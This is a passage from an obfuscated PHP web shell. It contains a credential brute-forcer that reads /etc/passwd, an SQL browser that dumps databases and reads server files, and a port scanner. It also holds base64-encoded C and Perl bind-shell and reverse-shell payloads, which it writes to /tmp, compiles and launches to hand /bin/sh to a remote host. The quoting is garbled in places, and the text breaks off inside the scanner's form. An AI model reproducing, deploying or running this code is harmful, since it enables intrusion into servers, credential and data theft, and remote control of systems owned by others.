dbname=''";${"GLOBALS"}["diywkav"]="res";${"GLOBALS"}["rfvfetlh"]="res";${${"GLOBALS"}["yeesjqjffj"]}=@pg_connect(${${"GLOBALS"}["ciqlnvafo"]}[0].":".${$nrvmdg}[1]?${${"GLOBALS"}["twjwiejv"]}[1]:5432,${${"GLOBALS"}["nmnarf"]},${${"GLOBALS"}["smkuajl"]});@pg_close(${${"GLOBALS"}["rfvfetlh"]});return${${"GLOBALS"}["diywkav"]};}}${"GLOBALS"}["cuhvdxekcis"]="attempts";${${"GLOBALS"}["vgghlfejh"]}=0;${${"GLOBALS"}["cuhvdxekcis"]}=0;${${"GLOBALS"}["twjwiejv"]}=explode(":",$_POST["server"]);if($_POST["type"]==1){$fqfmqgryurt="temp";${$fqfmqgryurt}=@file("/etc/passwd");if(is_array(${${"GLOBALS"}["mchkcbti"]})){foreach(${${"GLOBALS"}["mchkcbti"]} as${${"GLOBALS"}["fgjhbgumkz"]}){$fbtxjnmdgqt="line";$qdsyuueonwi="line";${$qdsyuueonwi}=explode(":",${$fbtxjnmdgqt});${"GLOBALS"}["hyftyqf"]="attempts";$aenlxxnik="server";$kzkuleesncbn="line";++${${"GLOBALS"}["hyftyqf"]};if(bruteForce(@${$aenlxxnik}[0],@${${"GLOBALS"}["twjwiejv"]}[1],${${"GLOBALS"}["fgjhbgumkz"]}[0],${$kzkuleesncbn}[0])){${"GLOBALS"}["nqdngyc"]="success";${${"GLOBALS"}["nqdngyc"]}++;echo"<b>".htmlspecialchars(${${"GLOBALS"}["fgjhbgumkz"]}[0])."</b>:".htmlspecialchars(${${"GLOBALS"}["fgjhbgumkz"]}[0])."<br>";}if(@$_POST["reverse"]){${"GLOBALS"}["hjfdvy"]="line";$wfmyqaw="i";${"GLOBALS"}["bvmuso"]="server";${"GLOBALS"}["yxheojivcde"]="i";$bshvfnhgrs="i";${${"GLOBALS"}["pmvkpva"]}="";$ypgcpt="attempts";for(${$bshvfnhgrs}=strlen(${${"GLOBALS"}["hjfdvy"]}[0])-1;${${"GLOBALS"}["rcrtozri"]}>=0;--${$wfmyqaw})${${"GLOBALS"}["pmvkpva"]}.=${${"GLOBALS"}["fgjhbgumkz"]}[0][${${"GLOBALS"}["yxheojivcde"]}];$kbvljloj="server";++${$ypgcpt};if(bruteForce(@${${"GLOBALS"}["bvmuso"]}[0],@${$kbvljloj}[1],${${"GLOBALS"}["fgjhbgumkz"]}[0],${${"GLOBALS"}["pmvkpva"]})){$acgfscmdxn="line";${${"GLOBALS"}["vgghlfejh"]}++;echo"<b>".htmlspecialchars(${$acgfscmdxn}[0])."</b>:".htmlspecialchars(${${"GLOBALS"}["pmvkpva"]});}}}}}elseif($_POST["type"]==2){${"GLOBALS"}["yyukpx"]="temp";${${"GLOBALS"}["mchkcbti"]}=@file($_POST["dict"]);if(is_array(${${"GLOBALS"}["yyukpx"]})){${"GLOBALS"}["ynsrnbb"]="temp";$ctjoxvvc="line";foreach(${${"GLOBALS"}["ynsrnbb"]} as${$ctjoxvvc}){$ttdomdkbxtg="line";$pijntjzxfjiq="server";${"GLOBALS"}["jvgoqpmlb"]="attempts";${"GLOBALS"}["lacdvbyl"]="line";${${"GLOBALS"}["lacdvbyl"]}=trim(${$ttdomdkbxtg});++${${"GLOBALS"}["jvgoqpmlb"]};if(bruteForce(${$pijntjzxfjiq}[0],@${${"GLOBALS"}["twjwiejv"]}[1],$_POST["login"],${${"GLOBALS"}["fgjhbgumkz"]})){${"GLOBALS"}["fqvwdtcyqyl"]="success";${"GLOBALS"}["ymkvrndt"]="line";${${"GLOBALS"}["fqvwdtcyqyl"]}++;echo"<b>".htmlspecialchars($_POST["login"])."</b>:".htmlspecialchars(${${"GLOBALS"}["ymkvrndt"]})."<br>";}}}}echo"<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";}echo"<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>"."<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>"."<input type=hidden name=c value=\"".htmlspecialchars($GLOBALS["cwd"])."">"."<input type=hidden name=a value="".htmlspecialchars($_POST["a"])."\">"."<input type=hidden name=charset value="".htmlspecialchars($_POST["charset"])."">"."<span>Server:port</span></td>"."<td><input type=text name=server value="127.0.0.1"></td></tr>"."<tr><td><span>Brute type</span></td>"."<td><label><input type=radio name=type value=\"1" checked> /etc/passwd</label></td></tr>"."<tr><td></td><td><label style="padding-left:15px\"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>"."<tr><td></td><td><label><input type=radio name=type value=\"2"> Dictionary</label></td></tr>"."<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>"."<td><input type=text name=login value=\"smurf"></td></tr>"."<tr><td><span>Dictionary</span></td>"."<td><input type=text name=dict value="".htmlspecialchars($GLOBALS["cwd"])."passwd.dic"></td></tr></table>"."</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>";echo"</div><br>";printFooter();}function actionSql(){class DbClass{var$type;var$link;var$res;function DbClass($type){${"GLOBALS"}["qeifsgewnw"]="type";$this->type=${${"GLOBALS"}["qeifsgewnw"]};}function connect($host,$user,$pass,$dbname){${"GLOBALS"}["dvbkpgcawqd"]="pass";switch($this->type){case"mysql":if($this->link=@mysql_connect($host,${${"GLOBALS"}["sdpydmesch"]},${${"GLOBALS"}["dvbkpgcawqd"]},true))return true;break;case"pgsql":$host=explode(":",$host);if(!$host[1])$host[1]=5432;if($this->link=@pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname"))return true;break;}return false;}function selectdb($db){$tyixgdx="db";switch($this->type){case"mysql":if(@mysql_select_db(${$tyixgdx}))return true;break;}return false;}function query($str){switch($this->type){case"mysql":return$this->res=@mysql_query(${${"GLOBALS"}["knqwqdn"]});break;case"pgsql":return$this->res=@pg_query($this->link,${${"GLOBALS"}["knqwqdn"]});break;}return false;}function fetch(){${${"GLOBALS"}["yeesjqjffj"]}=func_num_args()?func_get_arg(0):$this->res;switch($this->type){case"mysql":return@mysql_fetch_assoc(${${"GLOBALS"}["yeesjqjffj"]});break;case"pgsql":return@pg_fetch_assoc(${${"GLOBALS"}["yeesjqjffj"]});break;}return false;}function listDbs(){switch($this->type){case"mysql":return$this->res=@mysql_list_dbs($this->link);break;case"pgsql":return$this->res=$this->query("SELECT datname FROM pg_database");break;}return false;}function listTables(){switch($this->type){case"mysql":return$this->res=$this->query("SHOW TABLES");break;case"pgsql":return$this->res=$this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'");break;}return false;}function error(){switch($this->type){case"mysql":return@mysql_error($this->link);break;case"pgsql":return@pg_last_error($this->link);break;}return false;}function setCharset($str){${"GLOBALS"}["egwzxquhi"]="str";${"GLOBALS"}["xledfivdcw"]="str";switch($this->type){case"mysql":if(function_exists("mysql_set_charset"))return@mysql_set_charset(${${"GLOBALS"}["egwzxquhi"]},$this->link);else$this->query("SET CHARSET ".${${"GLOBALS"}["xledfivdcw"]});break;case"mysql":return@pg_set_client_encoding($this->link,${${"GLOBALS"}["knqwqdn"]});break;}return false;}function dump($table){$svsxktnyexuu="res";$hsefsrsnu="table";${"GLOBALS"}["siqwbgmjto"]="table";${"GLOBALS"}["qrwjfceigw"]="create";switch($this->type){case"mysql":${$svsxktnyexuu}=$this->query("SHOW CREATE TABLE `".${${"GLOBALS"}["zcitwlsk"]}."`");${${"GLOBALS"}["tivqaqwrlx"]}=mysql_fetch_array(${${"GLOBALS"}["yeesjqjffj"]});echo${${"GLOBALS"}["qrwjfceigw"]}[1].";";$this->query("SELECT * FROM `".${$hsefsrsnu}."`");while(${${"GLOBALS"}["ikpgbmcrqw"]}=$this->fetch()){$iqelkrdzpf="columns";${"GLOBALS"}["mxabku"]="k";$coovhn="item";$iqyfxhf="table";${$iqelkrdzpf}=array();foreach(${${"GLOBALS"}["ikpgbmcrqw"]} as${${"GLOBALS"}["mxabku"]}=>${${"GLOBALS"}["dyhbggvolpv"]}){$yuvhmgdu="columns";$fzcqflnfoyr="k";${"GLOBALS"}["iwzfygytca"]="k";$vygcctb="v";${${"GLOBALS"}["ikpgbmcrqw"]}[${${"GLOBALS"}["iwzfygytca"]}]="'".@mysql_real_escape_string(${$vygcctb})."'";${$yuvhmgdu}[]="`".${$fzcqflnfoyr}."`";}echo"INSERT INTO `".${$iqyfxhf}."` (".implode(", ",${${"GLOBALS"}["moaajquhps"]}).") VALUES (".implode(", ",${$coovhn}).");"."";}break;case"pgsql":$this->query("SELECT * FROM ".${${"GLOBALS"}["siqwbgmjto"]});while(${${"GLOBALS"}["ikpgbmcrqw"]}=$this->fetch()){$jggoauhrgtq="columns";${"GLOBALS"}["iwejlfpid"]="table";$vghutxleo="item";$pcytwohm="item";${${"GLOBALS"}["moaajquhps"]}=array();foreach(${$pcytwohm} as${${"GLOBALS"}["qcztealr"]}=>${${"GLOBALS"}["dyhbggvolpv"]}){$ghpmuvhez="columns";${"GLOBALS"}["jgebthpn"]="v";${${"GLOBALS"}["ikpgbmcrqw"]}[${${"GLOBALS"}["qcztealr"]}]="'".addslashes(${${"GLOBALS"}["jgebthpn"]})."'";${$ghpmuvhez}[]=${${"GLOBALS"}["qcztealr"]};}echo"INSERT INTO ".${${"GLOBALS"}["iwejlfpid"]}." (".implode(", ",${$jggoauhrgtq}).") VALUES (".implode(", ",${$vghutxleo}).");"."";}break;}return false;}}${"GLOBALS"}["jmhxsze"]="tmp";${${"GLOBALS"}["ydvbqrx"]}=new DbClass(@$_POST["type"]);if(@$_POST["p2"]=="download"){ob_start("ob_gzhandler",4096);$cgwcegqbfm="v";$db->connect($_POST["sql_host"],$_POST["sql_login"],$_POST["sql_pass"],$_POST["sql_base"]);$db->selectdb($_POST["sql_base"]);header("Content-Disposition: attachment; filename=dump.sql");header("Content-Type: text/plain");foreach($_POST["tbl"]as${$cgwcegqbfm})$db->dump(${${"GLOBALS"}["dyhbggvolpv"]});exit;}printHeader();echo"<h1>Sql browser</h1><div class=content>
  174. <form name="sf" method="post">
  175. <table cellpadding="2\" cellspacing=\"0\">
  176. <tr>
  177. <td>Type</td>
  178. <td>Host</td>
  179. <td>Login</td>
  180. <td>Password</td>
  181. <td>Database</td>
  182. <td></td>
  183. </tr>
  184. <tr>
  185. <input type=hidden name=a value=Sql>
  186. <input type=hidden name=p1 value='query'>
  187. <input type=hidden name=p2>
  188. <input type=hidden name=c value=\"".htmlspecialchars($GLOBALS["cwd"])."\">
  189. <input type=hidden name=charset value="".(isset($_POST["charset"])?$_POST["charset"]:"")."\">
  190. <td>
  191. <select name='type'>
  192. <option value="mysql\" ".(@$_POST["type"]=="mysql"?"selected":"").">MySql</option>
  193. <option value=\"pgsql" ".(@$_POST["type"]=="pgsql"?"selected":"").">PostgreSql</option>
  194. </select></td>
  195. <td><input type=text name=sql_host value="".(empty($_POST["sql_host"])?"localhost":htmlspecialchars($_POST["sql_host"])).""></td>
  196. <td><input type=text name=sql_login value=\"".(empty($_POST["sql_login"])?"root":htmlspecialchars($_POST["sql_login"])).""></td>
  197. <td><input type=text name=sql_pass value=\"".(empty($_POST["sql_pass"])?"":htmlspecialchars($_POST["sql_pass"])).""></td>
  198. <td>";${${"GLOBALS"}["jmhxsze"]}="<input type=text name=sql_base value=''>";if(isset($_POST["sql_host"])){${"GLOBALS"}["sqksncq"]="tmp";if($db->connect($_POST["sql_host"],$_POST["sql_login"],$_POST["sql_pass"],$_POST["sql_base"])){${"GLOBALS"}["owyeeitythp"]="item";switch($_POST["charset"]){case"Windows-1251":$db->setCharset("cp1251");break;case"UTF-8":$db->setCharset("utf8");break;case"KOI8-R":$db->setCharset("koi8r");break;case"KOI8-U":$db->setCharset("koi8u");break;case"cp866":$db->setCharset("cp866");break;}$db->listDbs();echo"<select name=sql_base><option value=''></option>";while(${${"GLOBALS"}["owyeeitythp"]}=$db->fetch()){${"GLOBALS"}["dhadbmsth"]="key";${"GLOBALS"}["rhzjoz"]="value";$kbezubpol="value";${"GLOBALS"}["jlvvjpwjbjz"]="item";$cckhpqs="value";list(${${"GLOBALS"}["dhadbmsth"]},${$kbezubpol})=each(${${"GLOBALS"}["jlvvjpwjbjz"]});echo"<option value=\"".${$cckhpqs}."\" ".(${${"GLOBALS"}["siaqbqlto"]}==$_POST["sql_base"]?"selected":"").">".${${"GLOBALS"}["rhzjoz"]}."</option>";}echo"</select>";}else echo${${"GLOBALS"}["sqksncq"]};}else echo${${"GLOBALS"}["pmvkpva"]};echo"</td>
  199. <td><input type=submit value=">>"></td>
  200. </tr>
  201. </table>
  202. <script>
  203. function st(t,l) {
  204. document.sf.p1.value = 'select';
  205. document.sf.p2.value = t;
  206. if(l!=null)document.sf.p3.value = l;
  207. document.sf.submit();
  208. }
  209. function is() {
  210. for(i=0;i<document.sf.elements['tbl[]'].length;++i)
  211. document.sf.elements['tbl[]'][i].checked = !document.sf.elements['tbl[]'][i].checked;
  212. }
  213. </script>";if(isset(${${"GLOBALS"}["ydvbqrx"]})&&$db->link){echo"<br/><table width=100% cellpadding=2 cellspacing=0>";if(!empty($_POST["sql_base"])){$db->selectdb($_POST["sql_base"]);${"GLOBALS"}["dwpqikugnvd"]="item";$uafkgm="tbls_res";echo"<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span><br><br>";${$uafkgm}=$db->listTables();while(${${"GLOBALS"}["dwpqikugnvd"]}=$db->fetch(${${"GLOBALS"}["ugmobgd"]})){$luurukxgjwn="n";${"GLOBALS"}["uexnolce"]="value";$fihiojhfqu="key";${"GLOBALS"}["kehiqzk"]="value";${"GLOBALS"}["ilryqxvo"]="item";list(${$fihiojhfqu},${${"GLOBALS"}["kehiqzk"]})=each(${${"GLOBALS"}["ilryqxvo"]});$uqbieiwdndp="value";${$luurukxgjwn}=$db->fetch($db->query("SELECT COUNT(*) as n FROM ".${${"GLOBALS"}["uexnolce"]}.""));${${"GLOBALS"}["siaqbqlto"]}=htmlspecialchars(${${"GLOBALS"}["siaqbqlto"]});echo"<nobr><input type='checkbox' name='tbl[]' value='".${${"GLOBALS"}["siaqbqlto"]}."'>&nbsp;<a href=# onclick=\"st('".${$uqbieiwdndp}."')">".${${"GLOBALS"}["siaqbqlto"]}."</a> (".${${"GLOBALS"}["unpqxrqvtt"]}["n"].")</nobr><br>";}echo"<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value="download\";document.sf.submit();'></td><td style='border-top:2px solid #666;'>";if(@$_POST["p1"]=="select"){${"GLOBALS"}["bqonblpj"]="i";${"GLOBALS"}["tjdgbpxt"]="num";$_POST["p1"]="query";${"GLOBALS"}["mocgugy"]="i";$db->query("SELECT COUNT(*) as n FROM ".$_POST["p2"]."");$bzirscvdr="num";${${"GLOBALS"}["tjdgbpxt"]}=$db->fetch();${${"GLOBALS"}["tvqhpjyj"]}=${$bzirscvdr}["n"];echo"<span>".$_POST["p2"]."</span> ($num) ";for(${${"GLOBALS"}["mocgugy"]}=0;${${"GLOBALS"}["rcrtozri"]}<(${${"GLOBALS"}["tvqhpjyj"]}/30);${${"GLOBALS"}["bqonblpj"]}++){${"GLOBALS"}["uyxvhw"]="i";${"GLOBALS"}["piwpmlnza"]="i";${"GLOBALS"}["iytwwdf"]="i";if(${${"GLOBALS"}["iytwwdf"]}!=(int)$_POST["p3"])echo"<a href='#' onclick='st(\"".$_POST["p2"]."", $i)'>",(${${"GLOBALS"}["uyxvhw"]}+1),"</a> ";else echo(${${"GLOBALS"}["piwpmlnza"]}+1)," ";}if($_POST["type"]=="pgsql")$_POST["p3"]="SELECT * FROM ".$_POST["p2"]." LIMIT 30 OFFSET ".($_POST["p3"]*30);else$_POST["p3"]="SELECT * FROM `".$_POST["p2"]."` LIMIT ".($_POST["p3"]*30).",30";echo"<br><br>";}if((@$_POST["p1"]=="query")&&!empty($_POST["p3"])){$db->query(@$_POST["p3"]);if($db->res!==false){${${"GLOBALS"}["wxptpkqm"]}=false;echo"<table width=100% cellspacing=0 cellpadding=2 class=main>";${${"GLOBALS"}["fgjhbgumkz"]}=1;while(${${"GLOBALS"}["ikpgbmcrqw"]}=$db->fetch()){$donksbxbpgs="line";${"GLOBALS"}["muonpwss"]="line";${"GLOBALS"}["jwhvjw"]="item";${"GLOBALS"}["scdmtry"]="value";if(!${${"GLOBALS"}["wxptpkqm"]}){${"GLOBALS"}["woqyywfb"]="key";$srmevbl="title";$gtqxhmqlxm="value";${"GLOBALS"}["bxwkvr"]="key";echo"<tr>";foreach(${${"GLOBALS"}["ikpgbmcrqw"]} as${${"GLOBALS"}["woqyywfb"]}=>${$gtqxhmqlxm})echo"<th>".${${"GLOBALS"}["bxwkvr"]}."</th>";reset(${${"GLOBALS"}["ikpgbmcrqw"]});${$srmevbl}=true;echo"</tr><tr>";${${"GLOBALS"}["fgjhbgumkz"]}=2;}echo"<tr class="l".${$donksbxbpgs}."">";${"GLOBALS"}["iqkogpqotz"]="line";${${"GLOBALS"}["muonpwss"]}=${${"GLOBALS"}["iqkogpqotz"]}==1?2:1;foreach(${${"GLOBALS"}["jwhvjw"]} as${${"GLOBALS"}["ldehnuiwej"]}=>${${"GLOBALS"}["scdmtry"]}){$qgiwnmm="value";if(${$qgiwnmm}==null)echo"<td><i>null</i></td>";else echo"<td>".nl2br(htmlspecialchars(${${"GLOBALS"}["siaqbqlto"]}))."</td>";}echo"</tr>";}echo"</table>";}else{echo"<div><b>Error:</b> ".htmlspecialchars($db->error())."</div>";}}echo"<br><textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars($_POST["p3"])."</textarea><br/><input type=submit value='Execute'>";echo"</td></tr>";}echo"</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";if(@$_POST["p1"]=="loadfile"){$gosjoyc="file";$db->query("SELECT LOAD_FILE('".addslashes($_POST["p2"])."') as file");${$gosjoyc}=$db->fetch();echo"<pre class=ml1>".htmlspecialchars(${${"GLOBALS"}["zegsuxtqof"]}["file"])."</pre>";}}echo"</div>";printFooter();}function actionNetwork(){printHeader();${${"GLOBALS"}["nkaubjks"]}="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";$hpdhnzmxa="back_connect_p";${$hpdhnzmxa}="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";${"GLOBALS"}["nzxwpdnf"]="bind_port_p";${${"GLOBALS"}["lcnlqellqg"]}="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";${${"GLOBALS"}["nzxwpdnf"]}="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";echo"<h1>Network tools</h1><div class=content>
  214. <form name='nfp' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;\">
  215. <br /><span>Bind port to /bin/sh</span><br/>
  216. Port: <input type='text' name='port' value='443'> Password: <input type='text' name='pass' value='smurf'> Using: <select name=\"using\"><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value=">>">
  217. </form>
  218. <form name='nfp' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;">
  219. <br /><br /><span>Back-connect to</span><br/>
  220. Server: <input type='text' name='server' value="".$_SERVER["REMOTE_ADDR"]."\"> Port: <input type='text' name='port' value='443'> Using: <select name=\"using\"><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value=">>">
  221. </form><br>";if(isset($_POST["p1"])){function cf($f,$t){${"GLOBALS"}["wyhrljpbiqm"]="w";${"GLOBALS"}["bcfvyxpdcz"]="f";${${"GLOBALS"}["wyhrljpbiqm"]}=@fopen(${${"GLOBALS"}["bcfvyxpdcz"]},"w")or@function_exists("file_put_contents");if(${${"GLOBALS"}["ijwldoj"]}){$xdzfbqowb="t";${"GLOBALS"}["koumrmjmxy"]="w";${"GLOBALS"}["kkiyveutw"]="t";${"GLOBALS"}["mfncdqla"]="w";@fwrite(${${"GLOBALS"}["koumrmjmxy"]},@base64_decode(${$xdzfbqowb}))or@fputs(${${"GLOBALS"}["ijwldoj"]},@base64_decode(${${"GLOBALS"}["ewvffcrq"]}))or@file_put_contents(${${"GLOBALS"}["itetujfjtui"]},@base64_decode(${${"GLOBALS"}["kkiyveutw"]}));@fclose(${${"GLOBALS"}["mfncdqla"]});}}if($_POST["p1"]=="bpc"){${"GLOBALS"}["yuubhpgqvv"]="out";cf("/tmp/bp.c",${${"GLOBALS"}["lcnlqellqg"]});$qtscikovewu="out";${${"GLOBALS"}["yuubhpgqvv"]}=ex("gcc -o /tmp/bp /tmp/bp.c");@unlink("/tmp/bp.c");${$qtscikovewu}.=ex("/tmp/bp ".$_POST["p2"]." ".$_POST["p3"]." &");echo"<pre class=ml1>$out".ex("ps aux | grep bp")."</pre>";}if($_POST["p1"]=="bpp"){${"GLOBALS"}["sjwnphvimsek"]="bind_port_p";cf("/tmp/bp.pl",${${"GLOBALS"}["sjwnphvimsek"]});${${"GLOBALS"}["ttiqfflposoq"]}=ex(which("perl")." /tmp/bp.pl ".$_POST["p2"]." &");echo"<pre class=ml1>$out".ex("ps aux | grep bp.pl")."</pre>";}if($_POST["p1"]=="bcc"){$rwjrybic="back_connect_c";$jjthihg="out";cf("/tmp/bc.c",${$rwjrybic});${$jjthihg}=ex("gcc -o /tmp/bc /tmp/bc.c");${"GLOBALS"}["fcvofpmdli"]="out";@unlink("/tmp/bc.c");${${"GLOBALS"}["fcvofpmdli"]}.=ex("/tmp/bc ".$_POST["p2"]." ".$_POST["p3"]." &");echo"<pre class=ml1>$out".ex("ps aux | grep bc")."</pre>";}if($_POST["p1"]=="bcp"){${"GLOBALS"}["vedkegsmqje"]="back_connect_p";${"GLOBALS"}["tfhjlsxt"]="out";cf("/tmp/bc.pl",${${"GLOBALS"}["vedkegsmqje"]});${${"GLOBALS"}["tfhjlsxt"]}=ex(which("perl")." /tmp/bc.pl ".$_POST["p2"]." ".$_POST["p3"]." &");echo"<pre class=ml1>$out".ex("ps aux | grep bc.pl")."</pre>";}}echo"</div>";printFooter();}function actionPortScanner(){printHeader();echo"<h1>Port Scanner</h1>";echo"<div class="content">";echo"<form action="" method="post\">";if(isset($_POST["host"])&&is_numeric($_POST["end"])&&is_numeric($_POST["start"])){$ycbghe="end";$xjvwgulsvr="end";${${"GLOBALS"}["sxrhsclv"]}=strip_tags($_POST["start"]);${"GLOBALS"}["syqzufkgpcq"]="start";$eihsryrr="i";${$ycbghe}=strip_tags($_POST["end"]);$host=strip_tags($_POST["host"]);for(${${"GLOBALS"}["rcrtozri"]}=${${"GLOBALS"}["syqzufkgpcq"]};${${"GLOBALS"}["rcrtozri"]}<=${$xjvwgulsvr};${$eihsryrr}++){$gohcggsd="i";${"GLOBALS"}["vxxuasv"]="errstr";${"GLOBALS"}["qrcaxnvjkn"]="fp";${${"GLOBALS"}["qrcaxnvjkn"]}=@fsockopen($host,${$gohcggsd},${${"GLOBALS"}["lcltujgfsfbo"]},${${"GLOBALS"}["vxxuasv"]},3);if(${${"GLOBALS"}["eqqfjdpz"]}){echo"Port ".${${"GLOBALS"}["rcrtozri"]}." is <font color=green>open</font><br>";}flush();}}else{echo"<br /><br /><center><input type="hidden" name="a" value=\"PortScanner\"><input type="hidden\" name=p1><input type=\"hidden\" name=\"p2">
  222. <input type=\"hidden" name=\"c\" value=\"".htmlspecialchars($GLOBALS["cwd"])."">
  223. <input type=\"hidden" name=\"charset\" value=\"".(isset($_POST["charset"])?$_POST["charset"]:"")."">
  224. Host: <input type=\"text" name=\"host\" value=\"localhost\"/><br /><br />
  225. Port start: <input type="text" name=\"start\" value="0\"/><br /><br />
  226. Port end:<input type=\"text" name="end\" value=\"5000\"/><br /><br />
  227. <input type=\"submit\" value=\"Scan Ports" />
